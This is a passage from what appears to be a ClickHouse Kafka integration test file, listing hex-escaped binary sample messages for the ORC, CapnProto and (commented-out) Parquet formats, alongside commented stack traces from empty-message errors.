e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
#''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto' : {
'data_sample' : [
'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
# 'Parquet' : {
# not working at all with Kafka: DB::Exception: IOError: Invalid Parquet file size is 0 bytes
# /contrib/libcxx/include/exception:129: std::exception::capture() @ 0x15c33fe8 in /usr/bin/clickhouse
# /contrib/libcxx/include/exception:109: std::exception::exception() @ 0x15c33fb5 in /usr/bin/clickhouse
# /contrib/poco/Foundation/src/Exception.cpp:27: Poco::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x21877833 in /usr/bin/clickhouse
# /src/Common/Exception.cpp:37: DB::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x15c2d2a3 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:70: DB::ParquetBlockInputFormat::prepareReader() @ 0x1df2b0c2 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:36: DB::ParquetBlockInputFormat::ParquetBlockInputFormat(DB::ReadBuffer&, DB::Block) @ 0x1df2af8b in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ParquetBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, 0ul, 1ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&>, std::__1::__tuple_indices<0ul, 1ul>) @ 0x1df2dc88 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ParquetBlockInputFormat>, DB::ParquetBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ParquetBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ParquetBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&>) @ 0x1df2d9c8 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ParquetBlockInputFormat, std::__1::allocator<DB::ParquetBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&>(std::__1::allocator<DB::ParquetBlockInputFormat>, DB::ReadBuffer&, DB::Block const&) @ 0x1df2d687 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ParquetBlockInputFormat>::value), std::__1::shared_ptr<DB::ParquetBlockInputFormat> >::type std::__1::make_shared<DB::ParquetBlockInputFormat, DB::ReadBuffer&, DB::Block const&>(DB::ReadBuffer&, DB::Block const&) @ 0x1df2d455 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:95: DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1df2cec7 in /usr/bin/clickhouse
# /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ce6a in /usr/bin/clickhouse
# /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2cd7d in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ccda in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2bdec in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:63: DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*) @ 0x1c9e9fc7 in /usr/bin/clickhouse
# /src/Storages/Kafka/StorageKafka.cpp:565: DB::StorageKafka::streamToViews() @ 0x1d8cc3fa in /usr/bin/clickhouse
# # 'data_sample' : [
# # '\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # '\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x1e\x19\x1c\x19\x5c\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\xa6\x06\x16\x1e\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc5\x01\x00\x00\x50\x41\x52\x31',
